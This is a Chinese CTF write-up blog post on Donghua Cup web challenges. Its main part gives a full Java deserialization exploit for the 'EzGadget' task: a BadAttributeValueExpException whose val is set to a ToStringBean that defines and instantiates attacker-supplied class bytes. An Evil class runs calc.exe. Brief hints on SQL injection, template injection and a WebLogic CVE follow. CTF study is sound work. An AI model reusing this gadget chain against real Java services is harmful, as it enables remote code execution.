东华杯

EzGadget

这题在我调了几个cc库之后再看就很简单了,可以看另一篇文章。

找一个重写readobject和tostring得类就行了,这里找到BadAttributeValueExpException类,这个类可以调试几个cc链就明白能用来利用啥了,可参考另一篇文章,这里就是利用了tostringbean的defineclass可以读取任意字节代码,所以就只需要将BadAttributeValueExpException中val值设为ToStringBean类就行了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
public String toString() {
    ToStringBean toStringBean = new ToStringBean();
    Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length);
    Object var3 = null;

    try {
        var3 = clazz.newInstance();
    } catch (InstantiationException var5) {
        var5.printStackTrace();
    } catch (IllegalAccessException var6) {
        var6.printStackTrace();
    }

    return "enjoy it.";
}

exp如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
import com.ezgame.ctf.tools.ToStringBean;
import com.ezgame.ctf.tools.Tools;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.charset.StandardCharsets;

public class Exec {
    public static void main(String[] args) {
        try {
            ToStringBean payload = new ToStringBean();

            File clzFile = new File("C:\\Users\\86130\\Desktop\\Evil.class");

            byte[] clzBytes = new byte[(int) clzFile.length()];

            FileInputStream fis = new FileInputStream(clzFile);
            fis.read(clzBytes); //read file into bytes[]
            fis.close();

            payload.setClassByte(clzBytes);

            BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException("placeholder");
            Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
            field.setAccessible(true);
            field.set(badAttributeValueExpException, payload);

            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();

            ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);

            out.writeUTF("gadgets");
            out.writeInt(2021);
            
            
            
            
            
            out.writeObject(badAttributeValueExpException);

            //String data = byteArrayOutputStream.toString();
            String data = Tools.base64Encode(byteArrayOutputStream.toByteArray());

            System.out.println(data);
            byte[] b = Tools.base64Decode(data);
            InputStream inputStream = new ByteArrayInputStream(b);
            ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
            String name = objectInputStream.readUTF();
            int year = objectInputStream.readInt();
            if (name.equals("gadgets") && year == 2021) {
                objectInputStream.readObject();
            }
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

Evil.java中写执行的命令就行了

1
2
3
4
5
6
7
8
9
10
11
public class Evil {
    static{
        try {
            Runtime r = Runtime.getRuntime();
            Process p = r.exec(new String[]{"calc.exe"});
            p.waitFor();
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

Eznode

第一步登录时注入,

要求查询结果与输入的用户密码相同,自输出,第五空间考过了一次

第二步时hcb模板渲染漏洞,参考https://xz.aliyun.com/t/4695

apacheproy

打现有的cve,比赛的时候没发现。weblogic的应用,版本12.2.1.3

参考https://www.jianshu.com/p/7d14e45a96e7

OldLibrary

又是go题

ctf
ctf web

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!